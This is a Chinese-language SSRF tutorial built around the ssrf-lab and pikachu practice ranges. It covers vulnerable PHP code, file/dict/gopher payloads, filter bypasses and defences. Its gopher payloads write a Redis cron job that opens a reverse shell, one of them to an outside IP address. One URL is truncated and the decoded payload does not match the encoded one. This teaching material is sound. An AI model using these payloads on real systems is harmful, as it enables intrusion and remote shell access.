WEB常见漏洞之SSRF(靶场篇)

本文涉及的产品
云数据库 Tair(兼容Redis),内存型 2GB
Redis 开源版,标准版 2GB
推荐场景:
搭建游戏排行榜
全局流量管理 GTM,标准版 1个月
简介: WEB常见漏洞之SSRF(靶场篇)

靶场地址:

    https://github.com/m6a-UdS/ssrf-lab
    https://github.com/zhuifengshaonianhanlu/pikachu

    0x01 概述

    SSRF 主要是由于一些危险函数与危险协议产生的。我们以 PHP 为例,

    列举一下这些危险函数

      file_get_contents()
      fsockopen()
      curl_exec()
      SoapClient

      危险协议

        file://
        gopher
        dict
        etc...

        0x02 SSRF利用方式

        主要分为两个方向,SSRF 利用相关的危险函数;SSRF 可利用的协议操作

        SSRF 利用相关的危险函数

        以 PHP 为例,说明一些可利用的危险函数

        1. file_get_contents() 与 readfile()

        file_get_contents这一函数是把 **传入的参数(变量)**写入字符串,当把 传参是内网文件的时候,会先去吧这个文件的内容读出来再写入,导致了任意文件读取,也就是信息泄露的一种。一般这种攻击也与目录遍历相结合。

        测试代码:

        // ssrf.php
        <?php
        $url = $_GET['url'];;
        echo file_get_contents($url);
        ?>

        2. fsockopen()

        fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接,初始化一个套接字连接到指定主机(hostname),实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接,进行传输原始数据。fsockopen() 将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets(),fgetss(),fwrite(),fclose()还有feof())如果调用失败,将返回false。

        测试代码:

        // ssrf.php
        <?php
        $host=$_GET['url'];
        $fp = fsockopen($host, 80, $errno, $errstr, 30);
        if (!$fp) {
            echo "$errstr ($errno)<br />\n";
        } else {
            $out = "GET / HTTP/1.1\r\n";
            $out .= "Host: $host\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            while (!feof($fp)) {
                echo fgets($fp, 128);
            }
            fclose($fp);
        }
        ?>

        构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页,这种更像是一种重定向 (302) 之类的,没什么用。

        3. curl_exec()

        curl_init(url) 函数初始化一个新的会话,返回一个 cURL 句柄,供curl_setopt(),curl_exec()和curl_close()函数使用。

        测试代码:

        // ssrf.php
        <?php 
        if (isset($_GET['url'])){
          $link = $_GET['url'];
          $curlobj = curl_init(); // 创建新的 cURL 资源
          curl_setopt($curlobj, CURLOPT_POST, 0);
          curl_setopt($curlobj,CURLOPT_URL,$link);
          curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // 设置 URL 和相应的选项
          $result=curl_exec($curlobj); // 抓取 URL 并把它传递给浏览器
          curl_close($curlobj); // 关闭 cURL 资源,并且释放系统资源
          // $filename = './curled/'.rand().'.txt';
          // file_put_contents($filename, $result); 
          echo $result;
        }
        ?>

        构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页:

        但是攻击方式不止这么一点,其实是可以通过其他方式提高curl_exec()这里的攻击危害的。

        最常见的是通过file、dict、gopher这三个协议来进行渗透

        curl -vvv 'dict://127.0.0.1:6379/info' 
        curl -vvv 'file:///etc/passwd' 
        # * 注意: 链接使用单引号,避免$变量问题 
        curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

        0x03 SSRF-Lab 靶场

        SSRF的危险协议

        可利用的常用协议:

        • file 协议结合目录遍历读取文件
        • gopher 协议打开端口
        • dict 协议主要用于结合curl攻击
        • http 协议进行内网探测
        1. file 协议利用

        基础 payload:


        file:///etc/password  # file:// 之后可以接任意文件

        结合GET请求(实战渗透常见攻击姿势) payload:


        http://ip/exp.php?url=file:///etc/password

        在 SSRF-Lab 靶场中直接输入基础的payload(不用GET方式传参)即可

        2. dict 协议利用

        使用 dict 协议,dict://ip//info可获取本地redis服务配置信息

        注:SSRF-Lab 靶场完成此操作需要另外安装 redis-server

        3. gopher 协议利用

        首先需要了解一下常见攻击 Redis 命令,然后转化为 Gopher 可用的协议

        redis-cli -h $1 flushall
        echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
        redis-cli -h $1 config set dir /var/spool/cron/
        redis-cli -h $1 config set dbfilename root
        redis-cli -h $1 save
        //redis-cli查看所有的keys及清空所有的数据

        这是常见exp,利用时根据需求更换 IP:Port 即可,更改为适配于 Gopher 协议的 URL


        gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0

        URL解码为:


        gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit

        0x04 皮卡丘靶场

        fsockopen()

        fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接,初始化一个套接字连接到指定主机(hostname),实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接,进行传输原始数据。fsockopen() 将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets(),fgetss(),fwrite(),fclose()还有feof())如果调用失败,将返回false。

        测试代码:

        // ssrf.php
        <?php
        $host=$_GET['url'];
        $fp = fsockopen($host, 80, $errno, $errstr, 30);
        if (!$fp) {
            echo "$errstr ($errno)<br />\n";
        } else {
            $out = "GET / HTTP/1.1\r\n";
            $out .= "Host: $host\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            while (!feof($fp)) {
                echo fgets($fp, 128);
            }
            fclose($fp);
        }
        ?>

        构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页:

        SSRF(file_get_content):利用file_get_content("path")利用传递的参数,通过file参数访问内部资源,或者跳转到其他服务器页面

        测试代码

        // ssrf.php
        <?php
        $url = $_GET['url'];;
        echo file_get_contents($url);
        ?>

        上述测试代码中,file_get_contents() 函数将整个文件或一个url所指向的文件读入一个字符串中,并展示给用户,我们构造类似 ssrf_fgc.php?file=../rce/rce.php 的paylaod即可读取服务器本地的任意文件(这里使用windows系统为例)

        curl_exec()

        curl_init(url)函数初始化一个新的会话,返回一个cURL句柄,供curl_setopt(),curl_exec()和curl_close() 函数使用

        测试代码

        // ssrf.php
        <?php 
        if (isset($_GET['url'])){
            $link = $_GET['url'];
            $curlobj = curl_init(); // 创建新的 cURL 资源
            curl_setopt($curlobj, CURLOPT_POST, 0);
            curl_setopt($curlobj,CURLOPT_URL,$link);
            curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // 设置 URL 和相应的选项
            $result=curl_exec($curlobj); // 抓取 URL 并把它传递给浏览器
            curl_close($curlobj); // 关闭 cURL 资源,并且释放系统资源
            // $filename = './curled/'.rand().'.txt';
            // file_put_contents($filename, $result); 
            echo $result;
        }
        ?>

        0x05 一些常见的绕过姿势

        1. @ 绕过

        URL格式为:


        [协议类型]://[访问资源需要的凭证信息]@[服务器地址]:[端口号]/[资源层级UNIX文件路径][文件名]?[查询]#[片段ID]

        下面是两种访问方式(效果一样,因为解析的本来就是 @ 后面的服务器地址):

        方式一、


        > <a href=”http://baidu.com@1.1.1.1″”>http://baidu.com@1.1.1.1

        方式二、


        > http://1.1.1.1

        2. 进制绕过

        这里可以参考 SSRF-Lab advance 的第一题

        源码

        if (preg_match('#^https?://#i', $handler) !== 1) {
        echo "Wrong scheme! You can only use http or https!";
         die();
        } else if (preg_match('#^https?://10.0.0.3#i', $handler) === 1) {
         echo "Restricted area!";
         die();
        }

        源码解读:通过正则对输入的 IP 进行了过滤,IP 地址是由四个字节组成的,一旦包含了小数点,就必须考虑到大小端表示,因为这个会影响 IP 地址的解析。不过好在所有的网络地址都是大端表示法,只需要注意这一点即可,下面我们介绍 IP 地址的表达方式。

          字符串:      10.0.0.3
          二进制:      00001010 . 00000000 . 00000000 . 00000011
          十六进制:    0A.00.00.03
          整数:        167772163

          这些表达方式都能被curl命令解析为正确的IP地址,之后如果我们要访问的IP地址被简单粗暴地过滤了就可以试试这种方法。除了上面的表达方式之外,还可以用 16 进制 0x0A000003 表示IP地址,还有一个很少人知道的绕过小姿势,就是用 8 进制代替 10 进制来表示 IP 地址。在计算机的世界里,一旦在20前面加个0就会变成8进制,比如 http://01200000003实际上还是 http://10.0.0.3上面两个表达方式,PHP 的 curl 模块能解析出来

            十六进制:http://0x0A.0x00.0x00.0x03
            八进制:     http://012.00.00.03八进制溢出:http://265.0.0.3

            3. 句号绕过 (替换 ".")

            4. xip.io 和 xip.name 绕过

            泛域名解析,无需配置,将自定义的任何域名解析到指定的IP地址。假设你的IP地址是10.0.0.1,你只需使用 前缀域名+IP地址+xip.io 即可完成相应自定义域名解析

              10.0.0.1.xip.io # 解析到 10.0.0.1
              www.10.0.0.2.xip.io # www 子域解析到 10.0.0.2 mysite.10.0.0.3.xip.io # mysite 子域解析到 10.0.0.3 foo.bar.10.0.0.4.xip.io # foo.bar 子域解析到 10.0.0.4

              xip.name 在使用上与xip.io一致

                10.0.0.1.xip.name # 解析到 10.0.0.1 
                www.10.0.0.2.xip.name # www 子域解析到 10.0.0.2 mysite.10.0.0.3.xip.name # mysite 子域解析到 10.0.0.3 foo.bar.10.0.0.4.xip.name # foo.bar 子域解析到 10.0.0.4

                5. DNS 重绑

                1.判定你给的 IP 或者域名解析后的 IP 是否在黑名单中

                2.若在,退出报错

                3.若不在,再次访问你给的 IP 或者域名解析后的 IP;执行后续业务模块

                思路:只需要有个域名,但是它映射两个 IP;同时设置 TTL 为 0,能方便两个 IP 即刻切换。

                效果类比:你访问 zxc.com这个域名,第一次解析的 IP 是 192.168.0.3;而第二次解析的IP是 127.0.0.1,如此一来即可进行 SSRF 攻击

                0x06 漏洞危害

                1. 扫内网
                2. 向内部任意主机的任意端口发送精心构造的Payload
                3. DOS攻击(请求大文件,始终保持连接Keep-Alive Always)
                4. 对内网web应用进行指纹识别,通过访问默认文件实现
                5. 攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sql注入等)
                6. 利用file协议读取本地文件等

                0x07 漏洞防御

                1.禁止跳转。
                2.过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
                3.限制请求的端口只能为Web端口,不需要的协议,仅仅允许http和https请求。可以防止类似于file://, gopher://, ftp:// 等引起的问题。
                4.设置URL白名单或者限制内网IP(使用gethostbyname()判断是否为内网IP),以防止对内网进行攻击。
                5.限制请求的端口为http常用的端口,比如 80、443、8080、8090。
                6.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
                7.对DNS Rebinding,考虑使用DNS缓存或者Host白名单

                相关实践学习
                基于Redis实现在线游戏积分排行榜
                本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。
                云数据库 Redis 版使用教程
                云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务,基于高可靠双机热备架构及可无缝扩展的集群架构,满足高读写性能场景及容量需弹性变配的业务需求。 产品详情:https://www.aliyun.com/product/kvstore &nbsp; &nbsp; ------------------------------------------------------------------------- 阿里云数据库体验:数据库上云实战 开发者云会免费提供一台带自建MySQL的源数据库&nbsp;ECS 实例和一台目标数据库&nbsp;RDS实例。跟着指引,您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。 点击下方链接,领取免费ECS&amp;RDS资源,30分钟完成数据库上云实战!https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl
                目录
                相关文章
                |
                25天前
                |
                缓存 移动开发 安全
                Web安全-HTTP响应拆分(CRLF注入)漏洞
                Web安全-HTTP响应拆分(CRLF注入)漏洞
                63 1
                |
                2月前
                |
                安全 关系型数据库 MySQL
                Web安全-条件竞争漏洞
                Web安全-条件竞争漏洞
                44 0
                |
                24天前
                |
                SQL
                Web for Pentester SQL sql注入靶场
                Web for Pentester SQL sql注入靶场
                |
                2月前
                |
                缓存 移动开发 安全
                Web安全-HTTP响应拆分(CRLF注入)漏洞
                Web安全-HTTP响应拆分(CRLF注入)漏洞
                109 8
                |
                2月前
                |
                安全 关系型数据库 Shell
                Web安全-浅析CSV注入漏洞的原理及利用
                Web安全-浅析CSV注入漏洞的原理及利用
                89 3
                |
                2月前
                |
                安全 应用服务中间件 开发工具
                Web安全-SVN信息泄露漏洞分析
                Web安全-SVN信息泄露漏洞分析
                140 2
                |
                2月前
                |
                JSON 安全 JavaScript
                Web安全-JQuery框架XSS漏洞浅析
                Web安全-JQuery框架XSS漏洞浅析
                296 2
                |
                2月前
                |
                安全 搜索推荐 应用服务中间件
                Web安全-目录遍历漏洞
                Web安全-目录遍历漏洞
                57 2
                |
                17天前
                |
                XML JSON API
                ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
                【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
                75 3
                |
                23天前
                |
                设计模式 测试技术 持续交付
                开发复杂Web应用程序
                【10月更文挑战第3天】开发复杂Web应用程序
                30 2